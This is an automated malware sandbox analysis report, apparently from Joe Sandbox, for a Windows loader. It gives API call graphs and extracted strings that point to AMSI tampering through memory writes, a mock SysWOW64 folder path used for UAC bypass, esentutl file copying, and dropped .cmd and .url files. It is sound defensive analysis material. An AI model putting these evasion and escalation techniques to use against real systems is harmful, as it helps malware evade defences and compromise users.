2a189d0 call 2a046d4 * 2 10061->10073 10301 2a2a46e-2a2a475 call 2a189d0 10073->10301 10102->9654 10136->9608 10306 2a2a47a-2a2a49c call 2a046d4 * 2 10301->10306 10318 2a2a4a1-2a2a4a8 call 2a189d0 10306->10318 10324 2a2a4ad-2a2a4cf call 2a046d4 * 2 10318->10324 10338 2a2a4d4-2a2a4db call 2a189d0 10324->10338 10344 2a2a4e0-2a2a502 call 2a046d4 * 2 10338->10344 10354 2a2a507-2a2a50e call 2a189d0 10344->10354 10360 2a2a513-2a2a9ad call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 * 5 10354->10360 10663 2a2a9b2-2a2aa07 call 2a189d0 * 6 10360->10663 10519 2a27055-2a2706c call 2a03700 10514->10519 10586->8994 10675 2a2aa0c-2a2aa16 call 2a189d0 10663->10675 10677 2a2aa1b-2a2aa43 call 2a189d0 * 3 10675->10677 10683 2a2aa48-2a2adce call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a046d4 * 2 10677->10683 10787 2a2add3-2a2adda call 2a189d0 10683->10787 10789 2a2addf-2a2ae01 call 2a046d4 * 2 10787->10789 10793 2a2ae06-2a2ae0d call 2a189d0 10789->10793 10795 2a2ae12-2a2ae34 call 2a046d4 * 2 10793->10795 10799 2a2ae39-2a2ae40 call 2a189d0 10795->10799 10801 2a2ae45-2a2b2f3 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a046d4 * 2 call 2a189d0 call 2a17c10 call 2a18338 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 10799->10801 10943 2a2b2f8-2a2b2fa ExitProcess 10801->10943
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                  • Part of subcall function 02A1DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02A1DD5E), ref: 02A1DCCB
                                                                                                                                  • Part of subcall function 02A1DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02A1DD05
                                                                                                                                  • Part of subcall function 02A1DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02A1DD32
                                                                                                                                  • Part of subcall function 02A1DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02A1DD3B
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,02A2BB30,00000000,00000000,02A2BB24,00000000,00000000), ref: 02A240CB
                                                                                                                                  • Part of subcall function 02A188B8: LoadLibraryW.KERNEL32(amsi), ref: 02A188C1
                                                                                                                                  • Part of subcall function 02A188B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A18920
                                                                                                                                • Sleep.KERNEL32(000003E8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,000003E8,ScanBuffer,02A87380,02A2B7B8,UacScan,02A87380), ref: 02A24277
                                                                                                                                  • Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
                                                                                                                                  • Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
                                                                                                                                  • Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6
                                                                                                                                • Sleep.KERNEL32(00004E20,UacScan,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,ScanBuffer,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,UacInitialize,02A87380,02A2B7B8), ref: 02A250EE
                                                                                                                                  • Part of subcall function 02A1DC04: RtlI.N(?,?,00000000,02A1DC7E), ref: 02A1DC2C
                                                                                                                                  • Part of subcall function 02A1DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC42
                                                                                                                                  • Part of subcall function 02A1DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02A1DC7E), ref: 02A1DC61
                                                                                                                                  • Part of subcall function 02A07E5C: GetFileAttributesA.KERNEL32(00000000,?,02A2041F,ScanString,02A87380,02A2B7B8,OpenSession,02A87380,02A2B7B8,ScanString,02A87380,02A2B7B8,UacScan,02A87380,02A2B7B8,UacInitialize), ref: 02A07E67
                                                                                                                                  • Part of subcall function 02A185BC: WinExec.KERNEL32(?,?), ref: 02A18624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                • API String ID: 2171786310-3926298568
                                                                                                                                • Opcode ID: e76600bef39930c89952ba11f5ed3a54b72b788e8b53b61f874ce380b81e5dba
                                                                                                                                • Instruction ID: 6247e122370117577e413c4b6a5fedc39a8511e07192a8af4a1e73e755712cf4
                                                                                                                                • Opcode Fuzzy Hash: e76600bef39930c89952ba11f5ed3a54b72b788e8b53b61f874ce380b81e5dba
                                                                                                                                • Instruction Fuzzy Hash: F5430B34A8016DDBEB10EB64EE80B9E73B6FF89304F1045E69509AB294DF30AE55CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 10970 2a1e678-2a1e67c 10971 2a1e681-2a1e686 10970->10971 10971->10971 10972 2a1e688-2a1ec81 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04740 * 2 call 2a04860 call 2a04778 call 2a030d4 call 2a046d4 * 2 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04740 call 2a07f2c call 2a049a0 call 2a04d74 call 2a04df0 call 2a04740 call 2a049a0 call 2a04d74 call 2a04df0 call 2a18788 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c 10971->10972 11175 2a1eee2-2a1ef2f call 2a04500 call 2a04c60 call 2a04500 call 2a04c60 call 2a04500 10972->11175 11176 2a1ec87-2a1eedd call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 call 2a04860 call 2a049a0 call 2a046d4 call 2a047ec call 2a049a0 call 2a046d4 call 2a189d0 WaitForSingleObject CloseHandle * 2 call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c call 2a04860 call 2a049a0 call 2a047ec call 2a049a0 call 2a1894c * 3 10972->11176 11176->11175
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A189D0: FreeLibrary.KERNEL32(75280000,00000000,00000000,00000000,00000000,02A8738C,Function_0000662C,00000004,02A8739C,02A8738C,05F5E103,00000040,02A873A0,75280000,00000000,00000000), ref: 02A18AAA
                                                                                                                                  • Part of subcall function 02A18788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02A18814
                                                                                                                                  • Part of subcall function 02A1894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize,02A873A8,02A1A93C,UacScan), ref: 02A18960
                                                                                                                                  • Part of subcall function 02A1894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02A1897A
                                                                                                                                  • Part of subcall function 02A1894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A8,00000000,02A873A8,02A1A587,ScanString,02A873A8,02A1A93C,ScanBuffer,02A873A8,02A1A93C,Initialize), ref: 02A189B6
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C,OpenSession,02A87380), ref: 02A1ED6E
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C,OpenSession), ref: 02A1ED76
                                                                                                                                • CloseHandle.KERNEL32(00000894,00000000,00000000,000000FF,ScanString,02A87380,02A1EF4C,OpenSession,02A87380,02A1EF4C,UacScan,02A87380,02A1EF4C,ScanBuffer,02A87380,02A1EF4C), ref: 02A1ED7F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                • API String ID: 3475578485-1053911981
                                                                                                                                • Opcode ID: aa810cee19f6e73042839f9d6ddca6597443b2aaf988d2922a9d8668269367ab
                                                                                                                                • Instruction ID: 3f1c8505901ae472ee54bedf9b063ef7e2454be5e890a3560eca6d58e21cf78d
                                                                                                                                • Opcode Fuzzy Hash: aa810cee19f6e73042839f9d6ddca6597443b2aaf988d2922a9d8668269367ab
                                                                                                                                • Instruction Fuzzy Hash: A222F434A801599FEB11EB64EAC1FCEB3F6BF89310F1081A2A505AB294DF30AD55CF55

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13139 2a01724-2a01736 13140 2a01968-2a0196d 13139->13140 13141 2a0173c-2a0174c 13139->13141 13142 2a01a80-2a01a83 13140->13142 13143 2a01973-2a01984 13140->13143 13144 2a017a4-2a017ad 13141->13144 13145 2a0174e-2a0175b 13141->13145 13149 2a01684-2a016ad VirtualAlloc 13142->13149 13150 2a01a89-2a01a8b 13142->13150 13146 2a01986-2a019a2 13143->13146 13147 2a01938-2a01945 13143->13147 13144->13145 13148 2a017af-2a017bb 13144->13148 13151 2a01774-2a01780 13145->13151 13152 2a0175d-2a0176a 13145->13152 13153 2a019b0-2a019bf 13146->13153 13154 2a019a4-2a019ac 13146->13154 13147->13146 13158 2a01947-2a0195b Sleep 13147->13158 13148->13145 13155 2a017bd-2a017c9 13148->13155 13156 2a016df-2a016e5 13149->13156 13157 2a016af-2a016dc call 2a01644 13149->13157 13161 2a017f0-2a017f9 13151->13161 13162 2a01782-2a01790 13151->13162 13159 2a01794-2a017a1 13152->13159 13160 2a0176c-2a01770 13152->13160 13164 2a019c1-2a019d5 13153->13164 13165 2a019d8-2a019e0 13153->13165 13163 2a01a0c-2a01a22 13154->13163 13155->13145 13166 2a017cb-2a017de Sleep 13155->13166 13157->13156 13158->13146 13170 2a0195d-2a01964 Sleep 13158->13170 13167 2a017fb-2a01808 13161->13167 13168 2a0182c-2a01836 13161->13168 13176 2a01a24-2a01a32 13163->13176 13177 2a01a3b-2a01a47 13163->13177 13164->13163 13172 2a019e2-2a019fa 13165->13172 13173 2a019fc-2a019fe call 2a015cc 13165->13173 13166->13145 13171 2a017e4-2a017eb Sleep 13166->13171 13167->13168 13174 2a0180a-2a0181e Sleep 13167->13174 13178 2a018a8-2a018b4 13168->13178 13179 2a01838-2a01863 13168->13179 13170->13147 13171->13144 13182 2a01a03-2a01a0b 13172->13182 13173->13182 13174->13168 13184 2a01820-2a01827 Sleep 13174->13184 13176->13177 13185 2a01a34 13176->13185 13188 2a01a68 13177->13188 13189 2a01a49-2a01a5c 13177->13189 13180 2a018b6-2a018c8 13178->13180 13181 2a018dc-2a018eb call 2a015cc 13178->13181 13186 2a01865-2a01873 13179->13186 13187 2a0187c-2a0188a 13179->13187 13191 2a018ca 13180->13191 13192 2a018cc-2a018da 13180->13192 13200 2a018fd-2a01936 13181->13200 13204 2a018ed-2a018f7 13181->13204 13184->13167 13185->13177 13186->13187 13194 2a01875 13186->13194 13195 2a018f8 13187->13195 13196 2a0188c-2a018a6 call 2a01500 13187->13196 13190 2a01a6d-2a01a7f 13188->13190 13189->13190 13197 2a01a5e-2a01a63 call 2a01500 13189->13197 13191->13192 13192->13200 13194->13187 13195->13200 13196->13200 13197->13190
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000), ref: 02A017D0
                                                                                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02A017E6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: f658a2513eb64b63323cc2f8a0338e00198313676e2755973f716f94fd35e949
                                                                                                                                • Instruction ID: dbfd951c230e84257eb2f34097e3f327611cba59fde1841d532db068b7d3014d
                                                                                                                                • Opcode Fuzzy Hash: f658a2513eb64b63323cc2f8a0338e00198313676e2755973f716f94fd35e949
                                                                                                                                • Instruction Fuzzy Hash: 89B12272A002528FDB15CF68E8C0395BBE1EB89315F1986AED44D8B3C5DF70E556CB90

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(amsi), ref: 02A188C1
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                  • Part of subcall function 02A17D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02A17DEC
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02A18920
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                • String ID: DllGetClassObject$W$amsi
                                                                                                                                • API String ID: 941070894-2671292670
                                                                                                                                • Opcode ID: 574e3339624bf3dbdffc176e8d03e3ed6e64c19b394f2df6cbbd8268c70defd2
                                                                                                                                • Instruction ID: 47b0eb6752e808f100f8fa39b9441400b842dae67851600785336a78e207f92e
                                                                                                                                • Opcode Fuzzy Hash: 574e3339624bf3dbdffc176e8d03e3ed6e64c19b394f2df6cbbd8268c70defd2
                                                                                                                                • Instruction Fuzzy Hash: 90F0A45058C381BDE301E3B48C45F4FBECD4B62674F008A18B1E85A2D2DA79D1148B67

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13227 2a01a8c-2a01a9b 13228 2a01aa1-2a01aa5 13227->13228 13229 2a01b6c-2a01b6f 13227->13229 13232 2a01aa7-2a01aae 13228->13232 13233 2a01b08-2a01b11 13228->13233 13230 2a01b75-2a01b7f 13229->13230 13231 2a01c5c-2a01c60 13229->13231 13239 2a01b81-2a01b8d 13230->13239 13240 2a01b3c-2a01b49 13230->13240 13236 2a01c66-2a01c6b 13231->13236 13237 2a016e8-2a0170b call 2a01644 VirtualFree 13231->13237 13234 2a01ab0-2a01abb 13232->13234 13235 2a01adc-2a01ade 13232->13235 13233->13232 13238 2a01b13-2a01b27 Sleep 13233->13238 13243 2a01ac4-2a01ad9 13234->13243 13244 2a01abd-2a01ac2 13234->13244 13245 2a01ae0-2a01af1 13235->13245 13246 2a01af3 13235->13246 13258 2a01716 13237->13258 13259 2a0170d-2a01714 13237->13259 13238->13232 13248 2a01b2d-2a01b38 Sleep 13238->13248 13241 2a01bc4-2a01bd2 13239->13241 13242 2a01b8f-2a01b92 13239->13242 13240->13239 13249 2a01b4b-2a01b5f Sleep 13240->13249 13250 2a01b96-2a01b9a 13241->13250 13252 2a01bd4-2a01bd9 call 2a014c0 13241->13252 13242->13250 13245->13246 13251 2a01af6-2a01b03 13245->13251 13246->13251 13248->13233 13249->13239 13254 2a01b61-2a01b68 Sleep 13249->13254 13255 2a01bdc-2a01be9 13250->13255 13256 2a01b9c-2a01ba2 13250->13256 13251->13230 13252->13250 13254->13240 13255->13256 13263 2a01beb-2a01bf2 call 2a014c0 13255->13263 13260 2a01bf4-2a01bfe 13256->13260 13261 2a01ba4-2a01bc2 call 2a01500 13256->13261 13264 2a01719-2a01723 13258->13264 13259->13264 13267 2a01c00-2a01c28 VirtualFree 13260->13267 13268 2a01c2c-2a01c59 call 2a01560 13260->13268 13263->13256
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000,?,?,00000000,02A01FE4), ref: 02A01B17
                                                                                                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A01FE4), ref: 02A01B31
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 61a1a231422a417b73befb996d6cc836670fcf4e18eaf283afbb91ff4d6c8760
                                                                                                                                • Instruction ID: d5721a09f35783c5031e1b279334eab4a2d6e9922b59a4fb6135af94b8089011
                                                                                                                                • Opcode Fuzzy Hash: 61a1a231422a417b73befb996d6cc836670fcf4e18eaf283afbb91ff4d6c8760
                                                                                                                                • Instruction Fuzzy Hash: 1E51B0716412408FE715CF6CEAC4796BBE0AF4A314F1885AED548CB2C2EF70D446CB91

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02A1E5F6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512091288.0000000002A2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002A87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000004.00000002.1512456941.0000000002B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2a00000_x.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CheckConnectionInternet
                                                                                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                • API String ID: 3847983778-3852638603
                                                                                                                                • Opcode ID: 2118a8ffc0f25d30a3c489626ef05a96dc74b3fd1d5fbe107668218354e60a95
                                                                                                                                • Instruction ID: 191b6954c8d95bfd40a8688c2697a7aee5504780da912cb0ac8b149f4c88892f
                                                                                                                                • Opcode Fuzzy Hash: 2118a8ffc0f25d30a3c489626ef05a96dc74b3fd1d5fbe107668218354e60a95
                                                                                                                                • Instruction Fuzzy Hash: 87413135B80248ABEB01EBA4EA81ADEB3FAFF8C710F504435E551A7284DE34AD118F55
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02A1823C,?,?,00000000,?,02A17A7E,ntdll,00000000,00000000,02A17AC3,?,?,00000000), ref: 02A1820A
                                                                                                                                  • Part of subcall function 02A181CC: GetModuleHandleA.KERNELBASE(?), ref: 02A1821E
                                                                                                                                  • Part of subcall function 02A18274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02A182FC,?,?,00000000,00000000,?,02A18215,00000000,KernelBASE,00000000,00000000,02A1823C), ref: 02A182C1
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02A182C7
                                                                                                                                  • Part of subcall function 02A18274: GetProcAddress.KERNEL32(?,?), ref: 02A182D9
                                                                                                                                • WinExec.KERNEL32(?,?), ref: 02A18624
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.1511920634.0000000002A01000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                • Associated: 00000004.00000002.1511899998.0000000002A00000.00000002.00001000.00020000.00000000.sdmpDownload File
